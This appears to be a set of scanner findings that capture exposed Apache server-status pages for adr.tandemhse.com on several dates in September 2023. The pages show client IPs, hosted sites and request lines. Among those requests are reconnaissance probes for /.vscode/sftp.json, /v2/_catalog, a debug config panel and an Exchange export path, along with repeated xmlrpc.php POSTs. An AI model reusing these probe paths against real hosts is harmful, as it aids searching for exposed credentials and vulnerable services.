74.207.237.46http/1.1pre.relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-216541420/951/19986_ 103.592046656390.022.35476.80 146.190.64.200h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-216541420/918/20679_ 103.7326140296290.023.38530.49 172.70.182.144h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-216541430/814/9356_ 96.2327025217900.014.61190.22 172.70.182.143h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-216541430/644/9213_ 96.2127128830510.011.02221.15 172.70.182.137h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-216541430/700/10057_ 96.0827021385010.011.19182.15 172.71.131.75h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-216541430/597/10163_ 96.2227052477510.011.99209.14 172.70.182.146h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-216541430/672/9922_ 96.2327735895930.013.92238.82 172.70.182.140h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-216541430/678/9222_ 94.85272718104905410.017.55200.79 172.71.222.45h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-216541430/674/9273_ 96.2027336095950.012.97184.20 172.70.182.137h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-216541430/743/9242_ 96.2227024262560.013.98189.53 172.70.182.153h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-216541430/557/9040_ 96.2327029824670.09.56194.71 172.70.182.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-216541430/803/9773_ 96.2027333291190.014.65201.96 172.70.182.135h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-216541410/561/16115_ 96.753074825320.09.11404.73 146.190.64.200h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-216541410/758/16160_ 96.753046372700.014.58412.84 146.190.64.200h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-216541410/724/16498_ 96.7626046318620.011.37445.59 172.70.182.133h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 3-216541410/479/17192_ 96.6226126365190.028.28432.45 103.23.61.80http/1.1lcftech.es:443POST /wp-cron.php?doing_wp_cron=1695446869.19667696952819824218 3-216541410/477/15369_ 96.790047720380.07.28390.20 146.190.64.200http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-216541410/704/15481_ 96.762273747100.015.97368.61 146.190.64.200http/1.1 3-216541410/681/15697_ 96.6826136822620.014.23377.44 103.23.61.80http/1.1lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-216541410/614/15633_ 96.791034943830.044.70439.91 146.190.64.200http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-216541410/637/16157_ 96.762028189610.08.33410.27 146.190.64.200h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-216541410/572/17149_ 96.791032917160.010.95351.76 146.190.64.200http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-217452020/275/29695_ 25.940157679630.06.61702.22 146.190.64.200http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-217452020/277/31175_ 25.921167828560.08.27685.03 172.70.182.144h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 4-217452020/347/29614_ 25.923056107760.06.12725.56 146.190.64.200http/1.1 4-217452020/320/30375_ 25.950054517530.05.24829.37 146.190.64.200http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-217452020/306/29693_ 25.951170683550.04.07693.57 146.190.64.200http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-217452020/298/29707_ 25.92232360173540.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755cd2ef552
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 19-Sep-2023 02:08:31 CEST Restart Time: Thursday, 07-Sep-2023 11:50:03 CEST Parent Server Config. Generation: 21 Parent Server MPM Generation: 20 Server uptime: 11 days 14 hours 18 minutes 27 seconds Server load: 0.27 0.18 0.13 Total accesses: 636399 - Total Traffic: 14.6 GB - Total Duration: 85121179 CPU Usage: u203.01 s192.39 cu1865.42 cs1371.52 - .363% CPU load .635 requests/sec - 15.3 kB/second - 24.1 kB/request - 133.754 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0437745no0yes010000 1513539no1yes010000 2437746no0yes010000 3437747no0yes010000 4531555no0yes19000 Sum501 149000 ______________________________________________W___ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-204377450/535/5483_ 83.173576349300.06.80109.88 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 0-204377450/546/5144_ 83.1116556702840.07.95123.25 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 0-204377450/548/5519_ 83.175477381910.07.14129.05 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 0-204377450/504/5459_ 83.051516557700.08.39105.67 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 0-204377450/511/5301_ 83.181527834790.017.99112.20 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 0-204377450/408/4923_ 83.132597555810.012.23112.21 46.101.103.192h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-204377450/526/5223_ 83.155498011620.010.20107.95 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 0-204377450/624/5289_ 83.18007694060.013.8485.04 46.101.103.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-204377450/491/5528_ 83.062498521930.016.68136.80 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 0-204377450/486/5090_ 83.1252616966500.09.0285.73 51.178.207.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-205135390/1457/17024_ 57.5815221865270.065.32451.08 46.101.103.192h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-205135390/1335/17054_ 57.5917222788970.036.29378.99 46.101.103.192http/1.1 1-205135390/1639/17428_ 57.5515523817860.043.33406.25 46.101.103.192h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-205135390/1494/17174_ 57.5725123086680.034.06385.96 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 1-205135390/1427/17014_ 57.5725520361480.020.09419.50 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 1-205135390/1343/17806_ 57.610019913600.021.25360.35 46.101.103.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-205135390/1415/17937_ 57.5525521700290.048.79452.39 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 1-205135390/1607/17568_ 57.5615419829100.038.01420.21 46.101.103.192http/1.1 1-205135390/1432/17281_ 57.602022960370.024.85415.34 46.101.103.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-205135390/1576/18159_ 57.5916024435070.031.63472.86 46.101.103.192http/1.1 2-204377460/822/5918_ 86.226538729550.012.81108.48 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-204377460/739/5992_ 86.258557965360.024.64156.71 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-204377460/819/6242_ 86.276539054720.014.94110.21 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-204377460/941/6541_ 86.21134912391730.019.00139.73 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-204377460/642/6080_ 86.280528809090.011.97146.11 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-204377460/771/5930_ 86.2513619558590.011.97114.46 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-204377460/818/5945_ 86.26137116261870.010.26121.33 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-204377460/708/5849_ 86.23145010980330.09.09100.20 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-204377460/798/5799_ 86.210518883360.014.86130.73 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 2-204377460/953/6175_ 86.2785615442740.011.10125.49 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 3-204377470/411/12479_ 76.6084517167290.05.14330.69 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 3-204377470/523/12460_ 76.6005715902900.029.05329.55 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 3-204377470/426/13322_ 76.640022027000.06.54360.29 46.101.103.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-204377470/387/13656_ 76.6315116710740.07.82329.50 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 3-204377470/372/12259_ 76.5715716715070.07.71325.62 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 3-204377470/523/12626_ 76.5414719050830.020.73295.73 46.101.103.192http/1.1 3-204377470/433/12572_ 76.630023411370.09.61292.39 46.101.103.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-204377470/391/12393_ 76.5505819396880.03.69310.50 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 3-204377470/411/12717_ 76.6404515897280.015.49330.61 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 3-204377470/369/13773_ 76.6294516269070.011.32282.30 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 4-205315550/497/21914_ 20.0914926386870.011.14510.95 46.101.103.192http/1.1 4-205315550/484/23005_ 20.200028132340.09.64474.25 46.101.103.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-205315550/366/21577_ 20.200026423700.06.02549.73 46.101.103.192http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 4-205315550/534/22120_ 20.1645725676360.06.63573.56 172.173.67.242http/1.1barrerasdecontencion.com:443POST //xmlrpc.php HTTP/1.1 4-205315550/334/21725_ 20.1815927085210.04.28502.03 46.101.103.192h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-205315550/516/21615_ 20.1615926619670.06.59583.43 46.101.103.192h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-205315550/402/22279W 20.140025601920.07.33525.28 46.101.103.192http/1.17f7ffb32-1f6e-4d16-
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c7557b0a2717
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 16-Sep-2023 17:43:35 CEST Restart Time: Thursday, 07-Sep-2023 11:50:03 CEST Parent Server Config. Generation: 20 Parent Server MPM Generation: 19 Server uptime: 9 days 5 hours 53 minutes 31 seconds Server load: 0.10 0.11 0.05 Total accesses: 531845 - Total Traffic: 12.1 GB - Total Duration: 72085877 CPU Usage: u257.28 s210.98 cu1418.86 cs1053.8 - .368% CPU load .666 requests/sec - 15.8 kB/second - 23.8 kB/request - 135.539 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0277443no0yes010000 1388014no0yes010000 2277444no0yes010000 3323894no0yes19000 4385445no2yes010001 Sum502 149001 _______________________________________W__________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-192774430/663/4927_ 104.443573315892920.013.97102.26 172.70.53.151http/1.1 0-192774430/643/4567_ 104.047416223580.021.19113.77 66.249.66.17http/1.1 0-192774430/759/4933_ 103.6335706861630.025.93120.83 172.68.168.81http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-192774430/708/4909_ 104.77792216005390.017.4795.07 66.249.66.17http/1.1lcftech.es:443GET / HTTP/1.1 0-192774430/756/4768_ 104.494052887214370.016.1393.68 172.69.240.74http/1.1 0-192774430/539/4483_ 102.689207187020.014.0299.45 172.71.193.12http/1.1 0-192774430/614/4674_ 104.047307488250.014.5997.38 172.69.240.74http/1.1 0-192774430/669/4620_ 104.17738217227880.010.8470.18 172.69.164.85http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-192774430/641/5009_ 104.7778488110090.016.46119.40 212.8.119.34h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-192774430/659/4579_ 104.663572746444900.010.7675.97 51.178.207.154h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-193880140/953/12862_ 36.88118215995140.030.47315.92 91.227.18.33http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 1-193880140/1024/12594_ 36.802016971010.027.80266.05 167.172.232.142http/1.1 1-193880140/944/12590_ 36.891016342750.026.94299.52 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-193880140/1025/12996_ 36.871125817067110.032.49284.25 54.36.148.34h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-193880140/942/12519_ 36.890014218720.030.96309.30 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-193880140/932/13486_ 36.844013768880.028.26276.08 167.172.232.142h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-193880140/990/13527_ 36.844015154650.062.63335.84 167.172.232.142h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-193880140/983/13013_ 36.891014029400.021.20321.71 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-193880140/975/12823_ 36.8820017174850.024.91321.88 103.23.61.80http/1.1lcftech.es:443POST /wp-cron.php?doing_wp_cron=1694878994.66737699508666992187 1-193880140/915/13235_ 36.8520018121680.027.91348.90 54.36.148.34http/1.1tandemsl.com:80GET /robots.txt HTTP/1.1 2-192774440/949/5069_ 114.7955307704440.014.5094.38 162.158.77.84http/1.1 2-192774440/991/5235_ 115.21548717134700.034.23131.47 172.70.253.75http/1.1 2-192774440/836/5405_ 114.885482397989310.013.9094.65 172.70.253.75http/1.1 2-192774440/948/5583_ 115.491809711554860.019.15120.42 185.182.57.95h2barrerasdecontencion.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-192774440/977/5418_ 115.344327926220.021.23133.10 103.23.61.80http/1.1lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-192774440/920/5118_ 114.953126788587600.022.97101.70 172.71.29.46http/1.1 2-192774440/1020/5081_ 115.544335915102830.021.55110.61 54.36.148.34h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-192774440/971/5117_ 114.955532789900190.021.6390.68 172.70.41.20http/1.1 2-192774440/837/4979_ 114.78432168066740.015.76112.40 172.69.4.78http/1.1 2-192774440/950/5200_ 115.14178014369310.031.20113.08 108.162.213.150http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-193238940/2748/11995_ 117.41504016588280.088.67323.62 66.249.66.66http/1.1 3-193238940/2375/11890_ 117.7142015184160.0108.16299.12 54.36.148.150http/1.1tandemsl.com:80GET / HTTP/1.1 3-193238940/2803/12854_ 117.393324421487600.092.73352.65 162.158.82.75http/1.1 3-193238940/2625/13147_ 117.4032015568610.063.35319.24 172.69.2.100http/1.1 3-193238940/2515/11845_ 117.64258216248900.070.02316.73 103.23.61.80http/1.1lcftech.es:443POST /wp-cron.php?doing_wp_cron=1694878756.85734391212463378906 3-193238940/2369/12003_ 116.8341018510580.054.50272.35 54.36.148.150http/1.1 3-193238940/2568/12080_ 117.41275022932860.073.50279.42 172.68.94.79http/1.1 3-193238940/2624/11925_ 117.052582517986400.076.55305.59 81.34.108.65h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-193238940/2859/12255_ 117.2125894115502360.082.41313.52 172.68.168.81http/1.1 3-193238940/2586/13355W 117.530015868120.047.39269.14 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-193854450/877/17644_ 36.300020981850.029.83399.61 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-193854450/905/18719_ 36.192023268800.026.16335.31 167.172.232.142h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-193854450/752/17453_ 36.301021474440.015.23449.90 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 4-193854450/835/17847_ 36.15216721313770.016.35469.08 172.71.193.12http/1.1 4-193854450/879/18041_ 36.302022646850.042.36390.48 167.172.232.142http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-193854450/889/17552_ 36.2632822543450.015.84495.14 167.172.232.142http/1.1 4-193854450/753/18563_ 36.2503121106520.016.20415.91 167.172.232.142http/1.1 4-193854450/883/17864_ 36.27398721870650.022.75417.39 167.172.232.142h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-193854450/919/17626_ 36.19214821331840.016.25414.12 167.172.232.142http/1.1 4-193854450/954/17868_ 36.2004222606050.017.29348.44 167.172.232.142
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755c3983fd8
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 14-Sep-2023 04:36:40 CEST Restart Time: Thursday, 07-Sep-2023 11:50:03 CEST Parent Server Config. Generation: 20 Parent Server MPM Generation: 19 Server uptime: 6 days 16 hours 46 minutes 37 seconds Server load: 0.36 0.35 0.34 Total accesses: 392984 - Total Traffic: 8.3 GB - Total Duration: 52909690 CPU Usage: u30.64 s34.57 cu1178.42 cs902.12 - .371% CPU load .679 requests/sec - 15.1 kB/second - 22.2 kB/request - 134.636 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0277443no0yes010000 1277574no0yes010000 2277444no0yes19000 3277603no0yes010000 4277545no0yes010000 Sum500 149000 ________________________W_________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-192774430/59/4323_ 2.4801104801390.00.3888.67 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 0-192774430/47/3971_ 2.52181285359210.03.2995.88 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 0-192774430/37/4211_ 2.3801085815220.00.2395.13 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 0-192774430/72/4273_ 2.55181185100330.00.6778.26 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 0-192774430/52/4064_ 2.4921206329540.00.2877.83 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 0-192774430/50/3994_ 2.56006224270.00.2785.70 165.22.74.203http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-192774430/38/4098_ 2.48181126667660.00.2583.05 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 0-192774430/50/4001_ 2.5521186010460.00.3559.69 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 0-192774430/40/4408_ 2.56007121540.00.25103.19 165.22.74.203http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-192774430/47/3967_ 2.5601285448650.00.3065.51 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 1-192775740/213/9151_ 7.17211610939010.01.35218.98 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 1-192775740/221/9212_ 7.17011913029350.01.40191.88 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 1-192775740/193/8957_ 7.210012226930.01.25203.98 165.22.74.203http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-192775740/192/9149_ 7.15210912474360.01.24181.12 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 1-192775740/205/8846_ 7.2021339986310.02.01203.37 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 1-192775740/217/9700_ 7.2001239673930.01.43172.88 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 1-192775740/202/9639_ 7.17316310692730.01.29196.36 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 1-192775740/209/9394_ 7.1801109830060.01.32219.65 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 1-192775740/209/9266_ 7.21014112735350.01.39207.76 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 1-192775740/202/9807_ 7.20013614016820.01.85222.80 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 2-192774440/40/4160_ 2.41161435877880.00.2380.12 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 2-192774440/43/4287_ 2.4601075405480.00.2797.52 165.22.74.203h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-192774440/42/4611_ 2.49161206410290.00.3581.10 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 2-192774440/46/4681_ 2.471610510006620.00.26101.53 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 2-192774440/40/4481W 2.43006428820.00.29112.15 165.22.74.203http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-192774440/42/4240_ 2.4801297014510.00.2879.01 165.22.74.203http/1.1 2-192774440/34/4095_ 2.462214413558280.00.2089.25 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 2-192774440/42/4188_ 2.48008436580.00.2769.33 165.22.74.203h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-192774440/37/4179_ 2.49202106465790.00.3496.99 216.244.66.197http/1.1tandemsl.com:443GET /robots.txt HTTP/1.1 2-192774440/49/4299_ 2.461911212952680.00.3482.22 216.244.66.197http/1.1 3-192776030/227/6790_ 7.38008539430.01.45163.82 165.22.74.203http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-192776030/214/6879_ 7.38007532550.01.41115.12 165.22.74.203http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-192776030/195/7153_ 7.360014027990.01.24183.80 165.22.74.203http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-192776030/225/7620_ 7.3201238321580.01.71164.53 165.22.74.203h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-192776030/195/6884_ 7.38009064240.01.39195.77 165.22.74.203http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-192776030/221/7193_ 7.31112311479590.01.69157.52 165.22.74.203h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-192776030/208/6503_ 7.34011415390490.01.58142.29 165.22.74.203http/1.1 3-192776030/210/6638_ 7.36012310426280.01.33155.48 165.22.74.203http/1.1 3-192776030/220/6925_ 7.3611378351720.04.48141.02 165.22.74.203h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-192776030/224/7418_ 7.3311498763110.05.11153.91 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 4-192775450/114/14114_ 3.94411016377220.00.60311.75 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 4-192775450/85/15116_ 3.90412417848650.00.58261.31 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 4-192775450/96/14202_ 3.97114316628330.00.61365.29 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 4-192775450/94/14770_ 3.94612016802340.00.59380.26 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 4-192775450/95/14688_ 3.94012918235390.00.63293.49 165.22.74.203http/1.1 4-192775450/73/14044_ 3.95613417633100.00.41385.71 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 4-192775450/108/15205_ 3.95012215646020.00.69341.56 165.22.74.203http/1.1 4-192775450/78/14675_ 3.92113417031880.00.46308.25 74.249.244.109http/1.1lcftech.es:443POST //xmlrpc.php HTTP/1.1 4-192775450/124/14223_ 3.96414216188490.01.17299.71 74.249.244.109http/1.1lcftech.es:443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755a8332476
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 13-Sep-2023 01:22:48 CEST Restart Time: Thursday, 07-Sep-2023 11:50:03 CEST Parent Server Config. Generation: 18 Parent Server MPM Generation: 17 Server uptime: 5 days 13 hours 32 minutes 45 seconds Server load: 0.08 0.15 0.11 Total accesses: 308668 - Total Traffic: 6.7 GB - Total Duration: 34288281 CPU Usage: u58.46 s52.19 cu909.98 cs617.88 - .341% CPU load .642 requests/sec - 14.6 kB/second - 22.7 kB/request - 111.085 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0221954no0yes010000 1221957no0yes19000 2221955no2yes19100 3221956no1yes010000 4222086no0yes010000 Sum503 248100 _______________W________W_________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-172219540/707/2738_ 23.183922719150.012.1257.37 103.23.61.80http/1.1tandemsl.com:443POST /wp-cron.php?doing_wp_cron=1694560852.70357608795166015625 0-172219540/690/2595_ 23.2101553407220.014.7258.09 200.68.186.77h2idle, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-172219540/633/2897_ 23.09303848310.010.9772.76 142.93.153.3http/1.1 0-172219540/644/2791_ 23.22803205510.010.2661.18 103.23.61.80http/1.1lcftech.es:443POST /wp-cron.php?doing_wp_cron=1694560911.24304699897766113281 0-172219540/647/2594_ 23.223904024230.013.6650.11 103.23.61.80http/1.1lcftech.es:443POST /wp-cron.php?doing_wp_cron=1694560910.64788103103637695312 0-172219540/554/2504_ 23.2421573354170.011.2168.22 142.93.153.3h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-172219540/540/2518_ 23.27004326210.013.1154.69 142.93.153.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-172219540/610/2508_ 23.26103767330.010.7241.24 142.93.153.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-172219540/724/2857_ 